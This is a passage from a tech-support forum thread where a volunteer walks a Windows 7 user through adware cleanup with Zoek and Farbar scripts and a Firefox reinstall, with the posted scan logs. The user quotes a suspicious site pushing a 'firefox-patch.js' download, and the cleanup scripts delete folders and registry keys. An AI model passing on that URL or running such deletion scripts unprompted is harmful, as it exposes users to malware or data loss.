  • on Windows Vista, 7, 8 and 10 right-click Zoek.exe and select: Run as Administrator
  • give it a few seconds to appear
  • copy/paste the entire script inside the codebox below into the input field of Zoek:
    autoclean;
    emptyalltemp;
    emptyclsid;
    emptyfolderscheck;delete
    ipconfig /flushdns;b
    
  • close any open programs.
  • click the Run script button, and wait. It takes a few minutes to run.
  • when the tool finishes, the zoek-results.log is opened in Notepad: the log can also be found on the systemdrive, normally C:\
  • if a reboot is needed, the log will be opened after the reboot.

Logs to include with next post:

Fixlog.txt
zoek-results.log


Thanks

Satchfan

 

If you could help to eliminate this unnecessary (Bloatware) that would be great and much appreciated.

Just tell me which and how.

CPU is now about 50%

 

 

Fix result of Farbar Recovery Scan Tool (x64) Version: 28-09-2016
Ran by [removed] (02-10-2016 08:47:19) Run:2
Running from C:\Users\[removed]\Desktop
[removed] Boot Mode: Normal
==============================================

fixlist content:
*****************
CloseProcesses:
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
Toolbar: HKU\S-1-5-21-531013560-757715300-2485835200-1000 -> No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - No File
2016-09-29 16:03 - 2016-09-29 16:03 - 00000484 _____ C:\Users\james\Documents\cc_20160929_160328.reg
*****************

Processes closed successfully.
"HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer" => key removed successfully
HKU\S-1-5-21-531013560-757715300-2485835200-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} => value removed successfully
HKCR\CLSID\{7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} => key not found.
C:\Users\james\Documents\cc_20160929_160328.reg => moved successfully


The system needed a reboot.

==== End of Fixlog 08:47:20 ====

 

 

Zoek.exe v5.0.0.1 Updated 19-September-2016
Tool run by james on Sun 10/02/2016 at  8:54:04.13.
Microsoft Windows 7 Home Premium  6.1.7601 Service Pack 1 x64
Running in: Normal Mode Internet Access Detected
Launched: C:\Users\james\Desktop\zoek.exe [Scan all users] [Script inserted]

==== System Restore Info ======================

10/2/2016 8:56:49 AM Zoek.exe System Restore Point Created Successfully.

==== Empty Folders Check ======================

C:\PROGRA~2\MSXML 4.0 deleted successfully
C:\Program Files\Common Files\AV deleted successfully
C:\Users\james\AppData\Roaming\TP deleted successfully
C:\Users\james\AppData\Local\CrashDumps deleted successfully
C:\Users\james\AppData\Local\EmieBrowserModeList deleted successfully
C:\Users\james\AppData\Local\EmieSiteList deleted successfully
C:\Users\james\AppData\Local\EmieUserList deleted successfully
C:\Users\james\AppData\Local\PDFC deleted successfully
C:\Users\james\AppData\Local\Skype deleted successfully
C:\Users\james\AppData\Local\VirtualStore deleted successfully

==== Deleting CLSID Registry Keys ======================


==== Deleting CLSID Registry Values ======================


==== Deleting Services ======================


==== FireFox Fix ======================

ProfilePath: C:\Users\james\AppData\Roaming\Mozilla\Firefox\Profiles\6uizn1ze.default-1451233910488

user.js not found
—- Lines yahoo removed from prefs.js —-
user_pref("browser.search.hiddenOneOffs", "Yahoo,Bing,Amazon.com,DuckDuckGo,eBay,Twitter,Wikipedia (en)");
—- FireFox user.js and prefs.js backups —-

prefs_20161002_0923_.backup

==== Batch Command(s) Run By Tool======================


==== Deleting Files \ Folders ======================

C:\PROGRA~3\Avg_Update_0215pi deleted
C:\PROGRA~3\{18165758-115C-4DC0-9EC2-FF89F725767F} deleted
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Shopping and Services deleted
C:\Windows\SysNative\config\systemprofile\Searches deleted
C:\Windows\Syswow64\InstallUtil.InstallLog deleted

==== Firefox Start and Search pages ======================

ProfilePath: C:\Users\james\AppData\Roaming\Mozilla\Firefox\Profiles\6uizn1ze.default-1451233910488
user_pref("browser.startup.homepage", "http://baynews9.com/content/news/baynews9/weather/klystron-9-radar.map.html/Florida.html");
user_pref("browser.search.defaultenginename.US", "Google");

==== Firefox Extensions Registry ======================

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Mozilla\Firefox\Extensions]
"[removed]"="C:\Program Files (x86)\Hewlett-Packard\SmartPrint\QPExtension" [12/30/2012 11:37 AM]

==== Firefox Extensions ======================

AppDir: C:\Program Files (x86)\Mozilla Firefox
- Undetermined - %AppDir%\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}.xpi

==== Firefox Plugins ======================

Profilepath: C:\Users\james\AppData\Roaming\Mozilla\Firefox\Profiles\6uizn1ze.default-1451233910488
18CF51689186AEB9D1D149AEB0E92D03    - C:\Program Files\Microsoft Office 15\root\Office15\NPSPWRAP.DLL -    Microsoft Office 2013


==== Chromium Look ======================


==== Set IE to Default ======================

Old Values:
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://baynews9.com/content/news/baynews9/weather/klystron-9-radar.map.html/Florida.html"

New Values:
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://baynews9.com/content/news/baynews9/weather/klystron-9-radar.map.html/Florida.html"

==== All HKLM and HKCU SearchScopes ======================

HKLM\SearchScopes "DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}"
HKLM\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} - http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
HKLM\Wow6432Node\SearchScopes "DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}"
HKLM\Wow6432Node\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} - http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
HKCU\SearchScopes "DefaultScope"="{5D73D38E-66DB-4F1F-93BE-27FF5207E70F}"
HKCU\SearchScopes\{012E1000-F331-11DB-8314-0800200C9A66} - http://www.google.com/search?q={searchTerms}
HKCU\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} - http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IESR02
HKCU\SearchScopes\{5D73D38E-66DB-4F1F-93BE-27FF5207E70F} - http://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:{language}:{referrer:source}&ie={inputEncoding?}&oe={outputEncoding?}

==== Empty IE Cache ======================

C:\Users\james\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 emptied successfully
C:\Windows\SysNative\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 emptied successfully

==== Empty FireFox Cache ======================

C:\Users\james\AppData\Local\Mozilla\Firefox\Profiles\6uizn1ze.default-1451233910488\cache2 emptied successfully
C:\Users\james\AppData\Roaming\Mozilla\Firefox\Profiles\6uizn1ze.default-1451233910488\storage\default\https+++www.wunderground.com\cache emptied successfully

==== Empty Chrome Cache ======================

No Chrome User Data found

==== Empty All Flash Cache ======================

No Flash Cache Found

==== Empty All Java Cache ======================

No Java Cache Found

==== C:\zoek_backup content ======================

C:\zoek_backup (files=11 folders=4 48360216 bytes)

==== Empty Temp Folders ======================

C:\Users\Default\AppData\Local\temp emptied successfully
C:\Users\Default User\AppData\Local\temp emptied successfully
C:\Users\james\AppData\Local\Temp will be emptied at reboot
C:\Users\Public\AppData\Local\temp emptied successfully
C:\Windows\serviceprofiles\networkservice\AppData\Local\Temp will be emptied at reboot
C:\Windows\serviceprofiles\Localservice\AppData\Local\Temp emptied successfully
C:\Windows\Temp will be emptied at reboot

==== After Reboot ======================

==== Empty Temp Folders ======================

C:\Windows\Temp successfully emptied
C:\Users\james\AppData\Local\Temp successfully emptied

==== Empty Recycle Bin ======================

C:\$RECYCLE.BIN successfully emptied

==== Deleting Files / Folders ======================

"C:\Windows\serviceprofiles\networkservice\AppData\Local\Temp\MpCmdRun-AD-53C9D589-6B66-4F30-9BAB-9A0193B0BAFC.lock" not found
"C:\Windows\serviceprofiles\networkservice\AppData\Local\Temp\MpCmdRun.log" not found
"C:\Windows\serviceprofiles\networkservice\AppData\Local\Temp\Low" not deleted

==== EOF on Sun 10/02/2016 at  9:34:19.64 ======================
 

See this page about "HP Bloatware" and decide what you want to keep or get rid of.

 

Also, from your log iooks like Avast may not have installed correctly so you might want to try uninstalling and re-installing it.

 

Let me know the situation when you've done that.

 

Satchfan

When I attempt to download Avast from here:

https://forums.whatthetech.com/index.php?showtopic=106388

MSE pops-up and says threats are being removed.

I disabled real – time protection in MSE and then downloaded.

 

Do you think this is a RAM issue?

 

The scan follows.

 

 

aswMBR version 1.0.1.2252 Copyright© 2014 AVAST Software
Run date: 2016-10-02 18:38:34
—————————–
18:38:34.351    OS Version: Windows x64 6.1.7601 Service Pack 1
18:38:34.351    Number of processors: 2 586 0x200
18:38:34.351    ComputerName: JAMES-HP  UserName: james
18:38:36.161    Initialize success
18:38:36.208    VM: initialized successfully
18:38:36.208    VM: Amd CPU BiosDisabled
18:40:00.230    AVAST engine defs: 16100200
18:41:20.601    Disk 0 (boot) \Device\Harddisk0\DR0 -> \Device\0000005e
18:41:20.648    Disk 0 Vendor: Hitachi_ JP2O Size: 476940MB BusType: 11
18:41:20.944    Disk 0 MBR read successfully
18:41:20.975    Disk 0 MBR scan
18:41:20.991    Disk 0 Windows 7 default MBR code
18:41:21.007    Disk 0 Partition 1 80 (A) 07    HPFS/NTFS NTFS          100 MB offset 2048
18:41:21.038    Disk 0 default boot code
18:41:21.100    Disk 0 Partition 2 00     07    HPFS/NTFS NTFS       459222 MB offset 206848
18:41:21.163    Disk 0 Partition 3 00     07    HPFS/NTFS NTFS        17616 MB offset 940693504
18:41:21.615    Disk 0 scanning C:\Windows\system32\drivers
18:42:00.724    Service scanning
18:42:44.937    Modules scanning
18:42:44.952    Disk 0 trace - called modules:
18:42:44.983    ntoskrnl.exe CLASSPNP.SYS disk.sys amd_xata.sys storport.sys hal.dll amd_sata.sys
18:42:44.999    1 nt!IofCallDriver -> \Device\Harddisk0\DR0[0xfffffa8004c42790]
18:42:44.999    3 CLASSPNP.SYS[fffff8800195143f] -> nt!IofCallDriver -> [0xfffffa800470c040]
18:42:45.015    5 amd_xata.sys[fffff88000c65d00] -> nt!IofCallDriver -> \Device\0000005e[0xfffffa8004708060]
18:42:48.712    AVAST engine scan C:\Windows
18:43:40.379    AVAST engine scan C:\Windows\system32
18:49:16.763    AVAST engine scan C:\Windows\system32\drivers
18:49:32.987    AVAST engine scan C:\Users\james
18:56:16.310    AVAST engine scan C:\ProgramData
18:58:21.533    Disk 0 statistics 4014848/0/0 @ 2.63 MB/s
18:58:21.549    Scan finished successfully
19:01:39.446    Disk 0 MBR has been saved successfully to "C:\Users\james\Desktop\MBR.dat"
19:01:39.461    The log file has been saved successfully to "C:\Users\james\Desktop\aswMBR.txt"

 

My apologies regarding Avast. I mistakenly advised you about that but it should not have been included in the previous post.

 

If you have installed Avast, please uninstall it as MSE is fine and 2 AVs will cause even more problems.

 

seems to have helped some with browser speed, not much

 

Which browser and is it the same with all browsers?

Firefox is all I'm using, per recommendation from this site.

IE  has been more trouble than it's worth on this machine, the last time I had problems and came here for help. it was recommended to try FF.

I did and never went back to IE.

I recently uninstalled FF and then re-installed it, thinking that may have been the cause of my problems.

If anything, CPU use has increased since re-installing.

 

I have been getting a pop-up from this site: https://oonivbookmarksense.net

It is named firefox-patch.js and a JavaScript file of 4.5 KB

Is this legit? I had thought I had downloaded this at least once or twice before.

 

https://oonivbookmarksense.net/1722913589829/ebce446498cc241acb8d96ee72473107/a3ac3ebdda6e5dfe5aacc5fe2f5c8b60.html

 

I don't see anything "JAVA" in my add/remove programs list.

I think the best thing is to uninstall and reinstall Firefox another way which will clear out all user data and plugins etc, so you are starting with a fresh install of Firefox.

You can backup your bookmarks if you need to but you will need to install any addins again.

Also note down any passwords etc.

Download a new copy of Firefox from here and save it to your desktop.

How to backup your bookmarks

  • open Firefox.
  • click the “Bookmarks” menu
  • click select Show All Bookmarks
  • in the “Library” window, click the Import and Backup button and then select Backup
  • in the “Bookmarks backup filename” window that opens, choose a location to save the file, which is named Bookmarks-"date".json by default
  • once the backup has run, close all windows and check location for backup file.

Remove Firefox

  • click on Start, Run
  • in the open text entry box please copy/paste appwiz.cpl Then click Enter.
  • press the Remove or Change/Remove…button to uninstall Firefox.

Delete files/folders in red

C:\Program Files (x86)Mozilla Firefox
C:\Users\james\AppData\Roamingmozilla

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
C:\Users\Public\Desktop\Mozilla Firefox.lnk
C:\Program Files (x86)Mozilla Maintenance Service


Reboot

Install the new copy of Firefox that you saved to the desktop.

Restore Bookmarks

  • open Firefox
  • click the “Bookmarks” menu
  • click Show All Bookmarks
  • in the “Library” window, click the “Import and Backup” button and then select Restore
  • in the “Bookmarks backup filename” window that opens, choose the location you saved the backup file to

When the restore has taken place, close all windows.

Open Firefox again and let me know how it is working now.

Satchfan

 

Ask AI

AI can make mistakes. Check the cited posts. Archived advice can be out-of-date

Don't include personal information. Questions and selected public posts go to OpenAI. About Ask AI